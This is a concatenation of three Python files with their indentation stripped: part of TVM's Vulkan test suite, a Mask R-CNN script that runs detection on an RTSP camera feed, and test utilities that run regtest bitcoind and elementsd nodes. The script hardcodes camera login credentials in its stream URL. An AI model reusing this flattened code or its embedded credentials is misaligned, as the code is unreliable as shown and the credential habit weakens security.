def test_array_copy(dev, dtype, fuzz_arr_size):
a_np = np.random.uniform(size=(fuzz_arr_size,)).astype(dtype)
a = tvm.nd.empty((fuzz_arr_size,), dtype, dev).copyfrom(a_np)
b_np = a.numpy()
tvm.testing.assert_allclose(a_np, b_np)
tvm.testing.assert_allclose(a_np, a.numpy())
@tvm.testing.exclude_targets("llvm")
def test_array_vectorize_add(target, dev, dtype):
arr_size = 64
lanes = 2
num_thread = 8
A = te.placeholder((arr_size,), name="A", dtype="%sx%d" % (dtype, lanes))
B = te.compute((arr_size,), lambda i: A[i] + tvm.tir.const(1, A.dtype), name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=num_thread)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
fun = tvm.build(s, [A, B], target)
a = tvm.nd.empty((arr_size,), A.dtype, dev).copyfrom(np.random.uniform(size=(arr_size, lanes)))
c = tvm.nd.empty((arr_size,), B.dtype, dev)
fun(a, c)
tvm.testing.assert_allclose(c.numpy(), a.numpy() + 1)
@tvm.testing.parametrize_targets("vulkan")
def test_vulkan_stress(target, dev):
"""
Launch a randomized test with multiple kernels per stream, multiple uses of
kernels per stream, over multiple threads.
"""
n = 1024
num_thread = 64
def run_stress():
def worker():
A = te.placeholder((n,), name="A", dtype="float32")
B = te.placeholder((n,), name="B", dtype="float32")
functions = [
(
lambda: te.compute((n,), lambda i: 2 * A[i] + 3 * B[i]),
lambda a, b: 2 * a + 3 * b,
),
(lambda: te.compute((n,), lambda i: A[i] + B[i]), lambda a, b: a + b),
(lambda: te.compute((n,), lambda i: A[i] + 2 * B[i]), lambda a, b: a + 2 * b),
]
def build_f(f_ref):
(C_f, ref) = f_ref
C = C_f()
s = te.create_schedule(C.op)
xo, xi = s[C].split(C.op.axis[0], factor=num_thread)
s[C].bind(xo, te.thread_axis("blockIdx.x"))
s[C].bind(xi, te.thread_axis("threadIdx.x"))
fun = tvm.build(s, [A, B, C], target)
return (fun, ref)
fs = [
build_f(random.choice(functions)) for _ in range(np.random.randint(low=1, high=10))
]
a = tvm.nd.empty((n,), A.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
b = tvm.nd.empty((n,), B.dtype, dev).copyfrom(np.random.uniform(size=(n,)))
cs = [tvm.nd.empty((n,), A.dtype, dev) for _ in fs]
for ((f, _), c) in zip(fs, cs):
f(a, b, c)
for ((_, ref), c) in zip(fs, cs):
tvm.testing.assert_allclose(c.numpy(), ref(a.numpy(), b.numpy()))
ts = [threading.Thread(target=worker) for _ in range(np.random.randint(1, 10))]
for t in ts:
t.start()
for t in ts:
t.join()
run_stress()
@tvm.testing.exclude_targets("llvm")
def test_vulkan_bool_load(target, dev):
arr_size = 1024
target = tvm.target.Target(target)
if target.kind.name == "vulkan":
supports_int8_buffer = target.attrs.get("supports_int8", False) and target.attrs.get(
"supports_8bit_buffer", False
)
if not supports_int8_buffer:
pytest.xfail(
"Vulkan target does not support int8 buffer access, used to transfer booleans"
)
def do_copy(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
tx = te.thread_axis("threadIdx.x")
bx = te.thread_axis("blockIdx.x")
max_threads = 32
ib.scope_attr(bx, "thread_extent", tvm.tir.indexdiv(n + max_threads - 1, max_threads))
ib.scope_attr(tx, "thread_extent", max_threads)
tid = bx * max_threads + tx
with ib.if_scope(tid < n):
B[tid] = cast(A[tid], "int32")
return ib.get()
A = te.placeholder((arr_size,), name="A", dtype="bool")
B = te.placeholder((arr_size,), name="B", dtype="int32")
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_copy(ins[0], outs[0], arr_size),
name="bool_copy_ir",
dtype="int32",
)
s = te.create_schedule(B.op)
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
a_np = np.random.uniform(size=arr_size) > 0.5
b_np = np.zeros((arr_size,), dtype="int32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
func(a, b)
ref = a_np.astype(np.int32)
tvm.testing.assert_allclose(b.numpy(), ref)
def check_mod(target, dev, mod, x_np, res_np):
res = relay.create_executor("vm", mod=mod, device=dev, target=target).evaluate()(x_np).numpy()
tvm.testing.assert_allclose(res, res_np, atol=1e-5)
def test_sqrt(target, dev):
# Three 32 bit pushconstants: any_dim, stride, stride
dtype = "float32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.sqrt(x))
x_np = np.random.uniform(size=(10,)).astype(dtype)
res_np = np.sqrt(x_np)
check_mod(target, dev, mod, x_np, res_np)
def test_argsort(target, dev):
# One 64 bit and one 32 bit constants
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.argsort(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.argsort(x_np)
check_mod(target, dev, mod, x_np, res_np)
def test_cumsum(target, dev):
# One 64 bit and one 32 bit constants
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x], relay.cumsum(x))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.cumsum(x_np)
check_mod(target, dev, mod, x_np, res_np)
def test_unique(target, dev):
dtype = "int32"
x = relay.var("x", shape=(relay.Any(),), dtype=dtype)
mod = tvm.IRModule()
[unique, _, _, num_unique] = relay.unique(x, is_sorted=True)
mod["main"] = relay.Function([x], relay.op.strided_slice(unique, begin=[0], end=num_unique))
x_np = np.random.randint(0, high=10, size=(10,)).astype(dtype)
res_np = np.unique(x_np)
check_mod(target, dev, mod, x_np, res_np)
vulkan_parameter_impl = tvm.testing.parameter("push_constants", "ubo")
vulkan_parameter_dtype = tvm.testing.parameter("int32", "float32", "int64")
# Only run on vulkan because extremely large numbers of input
# parameters can crash cuda/llvm compiler.
@tvm.testing.parametrize_targets("vulkan -from_device=0")
def test_vulkan_constant_passing(target, dev, vulkan_parameter_impl, vulkan_parameter_dtype):
target = tvm.target.Target(target)
dtype = vulkan_parameter_dtype
if not target.attrs.get("supports_int64", False):
pytest.xfail("Vulkan target does not support Int64 variables")
# f_add has 3+num_int_params scalar parameters. The other three
# are length_n, stride1, and stride2.
if vulkan_parameter_impl == "push_constants":
# 4 params, 32 bytes. Within 128-byte spec-guaranteed size of
# push constants. Uses push constants.
num_int_params = 1
else:
# 24 params, 192 bytes. May be above spec-guaranteed size of 128
# bytes for push constants. Uses either push constants or UBO,
# depending on the device.
max_push_constants_size = int(target.attrs.get("max_push_constants_size", 128))
max_int_params_in_push = max_push_constants_size // 8 - 3
num_int_params = max_int_params_in_push + 1
n = te.var("n")
scalars = [te.var("scale{}".format(i), dtype=dtype) for i in range(num_int_params)]
scalar_sum = scalars[0]
for s in scalars[1:]:
scalar_sum += s
A = te.placeholder((n,), name="A", dtype=dtype)
B = te.compute(A.shape, lambda i: scalar_sum + A[i], name="B")
s = te.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=64)
s[B].bind(xo, te.thread_axis("blockIdx.x"))
s[B].bind(xi, te.thread_axis("threadIdx.x"))
f_add = tvm.build(s, scalars + [A, B], target)
n = 1024
scalars = np.array([1 for _ in scalars]).astype(dtype)
a = tvm.nd.array(np.random.uniform(size=n).astype(A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=B.dtype), dev)
f_add(*scalars, a, b)
tvm.testing.assert_allclose(a.numpy() + sum(scalars), b.numpy())
def test_vulkan_while_if(target, dev):
target = tvm.target.Target(target)
def do_compute(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
if "gpu" in target.keys:
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
iterations = ib.allocate("int32", (1,), name="iterations", scope="local")
iterations[0] = 0
B[0] = 0
# WhileNode's condition is re-evaluated every loop. The
# if_then_else block introduces additional labels/blocks that
# must be kept separate from the WhileNode's block.
loop_condition = iterations[0] < tvm.tir.if_then_else(A[0] > 0, 10, 20)
with ib.while_loop(loop_condition):
iterations[0] += 1
B[0] += iterations[0]
return ib.get()
n = 1
dtype = "int32"
A = te.placeholder((n,), name="A", dtype=dtype)
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_compute(ins[0], outs[0], n),
dtype=dtype,
)
s = te.create_schedule(B.op)
# Point of failure would be here, at tvm.build.
with tvm.transform.PassContext(opt_level=3):
func = tvm.build(s, [A, B], target)
a = tvm.nd.array(np.array([5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.numpy(), [55])
a = tvm.nd.array(np.array([-5], dtype=A.dtype), dev)
b = tvm.nd.array(np.zeros(n, dtype=A.dtype), dev)
func(a, b)
tvm.testing.assert_allclose(b.numpy(), [210])
@tvm.testing.exclude_targets("llvm")
def test_vulkan_local_threadidx(target, dev):
# To access the thread index, the vulkan runtime accesses a global
# array of thread indices, storing the result in a local variable.
# In CUDA, these are the built-in threadIdx.x variables, which are
# globally accessible. In vulkan, these local variables must be
# defined inside a function, but are hoisted up to the function
# header to mimic the global CUDA semantics. Before this
# hoisting, this test could trigger spvValidate errors for
# potentially undeclared variables.
def do_compute(A, B, n):
ib = tvm.tir.ir_builder.create()
A = ib.buffer_ptr(A)
B = ib.buffer_ptr(B)
# One single declaration of te.thread_axis.
tx = te.thread_axis("threadIdx.x")
with ib.for_range(0, 1):
# Used inside a for-loop scope, defines local thread_id
# variable.
ib.scope_attr(tx, "thread_extent", 16)
B[tx + 0] = A[tx + 0]
with ib.for_range(0, 1):
# Used in next scope. If local variable defined at point
# of use instead of function header, will fail spvValidate
# for access of out-of-scope local variable.
ib.scope_attr(tx, "thread_extent", 16)
B[tx + 16] = A[tx + 16]
return ib.get()
n = te.var("n")
A = te.placeholder((n,), name="A", dtype="int32")
B = te.placeholder((n,), name="B", dtype="int32")
B = te.extern(
A.shape,
[A],
lambda ins, outs: do_compute(ins[0], outs[0], n),
dtype="int32",
)
s = te.create_schedule(B.op)
# Expected failure occurs at build step.
func = tvm.build(s, [A, B], target)
n = 32
a_np = np.arange(n).astype(dtype=A.dtype)
b_np = np.zeros((n,), dtype="int32")
a = tvm.nd.array(a_np, dev)
b = tvm.nd.array(b_np, dev)
func(a, b)
tvm.testing.assert_allclose(b.numpy(), a_np)
class TestVectorizedIndices:
load_type, store_type = tvm.testing.parameters(
# Load N values, write to N locations.
# Vectorized copy.
("ramp", "ramp"),
# Load 1 value, write to N locations.
# Scalar load, vectorized store.
#
# Most TVM operations (e.g. schedule[tensor].vectorize(axis)) have
# the broadcast outside of the index, but it is semantically okay
# for the broadcast to be inside the index, and it shows up with
# some optimizations.
("broadcast", "ramp"),
# Load 1 values, write to 1 location.
# Broadcasting on both sides should be equivalent to a scalar copy.
("broadcast", "broadcast"),
# Loads N values, write to 1 location.
# Disabled as it would have unclear semantics.
# ("ramp","broadcoast"),
)
indirect_indices = tvm.testing.parameter(True, False, ids=["reorder", "no_reorder"])
@tvm.testing.fixture
def ref_data(self, load_type, store_type, indirect_indices):
n = 4
index_map = {
"ramp": np.arange(n),
"broadcast": np.zeros(n, dtype="int32"),
}
a_np = np.random.randint(np.iinfo("int32").max, size=n).astype("int32")
b_np = np.zeros(shape=n, dtype=a_np.dtype)
reorder_np = np.arange(n, dtype="int32")[::-1]
load_index = index_map[load_type]
store_index = index_map[store_type]
if indirect_indices:
load_index = reorder_np[load_index]
b_np[store_index] = a_np[load_index]
return a_np, reorder_np, b_np
@tvm.testing.fixture
def mod(self, target, load_type, store_type, indirect_indices):
target = tvm.target.Target(target)
n = 4
dtype = "int32"
A = te.placeholder((n,), dtype=dtype, name="A")
R = te.placeholder((n,), dtype=dtype, name="R")
def do_compute(ins, outs):
ib = tvm.tir.ir_builder.create()
A, R = map(ib.buffer_ptr, ins)
B = ib.buffer_ptr(outs[0])
if "gpu" in target.keys:
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
index_map = {
"ramp": tvm.tir.Ramp(0, 1, 4),
"broadcast": tvm.tir.Broadcast(0, 4),
}
load_index = index_map[load_type]
store_index = index_map[store_type]
if indirect_indices:
load_index = R[load_index]
B[store_index] = A[load_index]
return ib.get()
B = te.extern(A.shape, [A, R], do_compute, dtype="int32")
s = te.create_schedule(B.op)
return tvm.lower(s, [A, R, B])
def test_ramp_broadcast_index(self, target, dev, mod, ref_data):
f = tvm.build(mod, target=target)
a_np, reorder_np, b_np = ref_data
a = tvm.nd.array(a_np, dev)
r = tvm.nd.array(reorder_np, dev)
b = tvm.nd.array(np.zeros(shape=b_np.shape, dtype="int32"), dev)
f(a, r, b)
tvm.testing.assert_allclose(b.numpy(), b_np)
@tvm.testing.parametrize_targets("vulkan -max_shared_memory_per_block=16384")
def test_shared_mem_alloc(target, dev):
alloc_nbytes = 16384 * 2
def do_compute(ins, outs):
ib = tvm.tir.ir_builder.create()
out = ib.buffer_ptr(outs[0])
ib.scope_attr(te.thread_axis("blockIdx.x"), "thread_extent", 0)
array = ib.allocate("int32", (alloc_nbytes,), name="array", scope="shared")
array[0] = 0
out[0] = array[0]
return ib.get()
Out = te.extern(
shape=(1,),
inputs=[],
fcompute=do_compute,
dtype="int32",
)
s = te.create_schedule(Out.op)
# Codegen should raise error when allocating more memory than the
# target supports.
with pytest.raises(tvm.TVMError):
tvm.build(s, [Out], target)
if __name__ == "__main__":
import sys
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
test_video.py
|
import cv2
import numpy as np
import os
import sys
import random
import math
import skimage.io
import time
import matplotlib.pyplot as plt
import threading
import tensorflow as tf
ROOT_DIR = os.path.abspath("../../")
sys.path.append(ROOT_DIR)
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn.config import Config
# To find local version
sys.path.append(os.path.join(ROOT_DIR, "samples/coco/"))
import coco
def random_colors(N):
np.random.seed(1)
colors = [tuple(255*np.random.rand(3)) for _ in range(N)]
return colors
def apply_mask(image, mask, color, alpha=0.5):
"""Apply the given mask to the image.
"""
for n, c in enumerate(color):
image[:, :, n] = np.where(
mask == 1,
image[:, :, n] * (1 - alpha) + alpha * c,
image[:, :, n]
)
return image
def display_instances(image, boxes, masks, ids, names, scores):
n_instances = boxes.shape[0]
if not n_instances:
print('No instances to display')
else:
assert boxes.shape[0] == masks.shape[-1] == ids.shape[0]
colors = random_colors(n_instances)
height, width = image.shape[:2]
for i, color in enumerate(colors):
if not np.any(boxes[i]):
continue
y1, x1, y2, x2 = boxes[i]
mask = masks[:, :, i]
image = apply_mask(image, mask, color)
image = cv2.rectangle(image, (x1, y1), (x2, y2), color, 2)
label = names[ids[i]]
score = scores[i] if scores is not None else None
caption = '{}{:.2f}'.format(label, score) if score else label
image = cv2.putText(
image, caption, (x1, y1), cv2.FONT_HERSHEY_COMPLEX, 0.7, color, 2
)
return image
if __name__ == '__main__':
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
COCO_MODEL_PATH = os.path.join(MODEL_DIR, "mask_rcnn_my.h5")
if not os.path.exists(COCO_MODEL_PATH):
print('cannot find coco_model')
class InferenceConfig(Config):
# Give the configuration a recognizable name,给配置一个名称用于构造网络
NAME = "shapes"
GPU_COUNT = 1
IMAGES_PER_GPU = 1
IMAGE_MIN_DIM = 768
IMAGE_MAX_DIM = 1280
# IMAGE_MIN_DIM = 1088
# IMAGE_MAX_DIM = 1920
# IMAGE_MIN_DIM = 576
# IMAGE_MAX_DIM = 704
# 分类数量
NUM_CLASSES = 1 + 10 # background + 1 shapes
# 控制识别图片的大小
RPN_ANCHOR_SCALES = (8*6, 16*6, 32*6, 64*6, 128*6) # anchor side in pixels
config = InferenceConfig()
config.display()
# config2 = coco.CocoConfig()
# config2.display()
model = modellib.MaskRCNN(
mode="inference", model_dir=MODEL_DIR, config=config
)
# Load weights trained on MS-COCO
model.load_weights(COCO_MODEL_PATH, by_name=True)
# class_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
# 'bus', 'train', 'truck', 'boat', 'traffic light',
# 'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
# 'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
# 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
# 'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
# 'kite', 'baseball bat', 'baseball glove', 'skateboard',
# 'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
# 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
# 'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
# 'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
# 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
# 'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
# 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
# 'teddy bear', 'hair drier', 'toothbrush']
class_names = ['BG', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
capture = cv2.VideoCapture(
"rtsp://admin:admin123@192.168.3.76:554/Streaming/Channels/1")
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 720)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1366)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 768)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 1280)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 960)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 704)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 576)
# capture.set(cv2.CAP_PROP_FRAME_WIDTH, 352)
# capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 288)
graphNow = tf.get_default_graph()
def detectModel(model, frame):
frame=cv2.resize(frame,(512,512))
print("线程启动",threading.currentThread().ident,frame.shape)
start = time.time()
with graphNow.as_default():
results = model.detect([frame], verbose=0)
r = results[0]
# frame = display_instances(
# frame, r['rois'], r['masks'], r['class_ids'],
# class_names, r['scores']
# )
end = time.time()
print("识别时间:")
print(end-start)
print("线程结束",threading.currentThread().ident)
t1 = None
i=0
# 先识别一次,首次识别耗时较长
ret, frame = capture.read()
results = model.detect([frame], verbose=0)
while ret:
start = time.time()
ret, frame = capture.read()
if t1 == None or t1.isAlive() == False:
# if i%7==0:
t1 = threading.Thread(target=detectModel, args=(model, frame))
t1.start()
i+=1
end = time.time()
# print("视频每帧时间:")
# print(end-start)
# cv2.imshow('frame', frame)
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
cv2.destroyAllWindows()
capture.release()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import math
import os
import random
import re
import shutil
import sqlite3
import string
import struct
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
# Gossip can be slow without DEVELOPER.
if DEVELOPER:
DEFAULT_TIMEOUT = 60
else:
DEFAULT_TIMEOUT = 180
TIMEOUT = int(os.getenv("TIMEOUT", str(DEFAULT_TIMEOUT)))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
COMPAT = os.getenv("COMPAT", config['COMPAT']) == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'vipstarcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'vipstarcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'vipstarcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
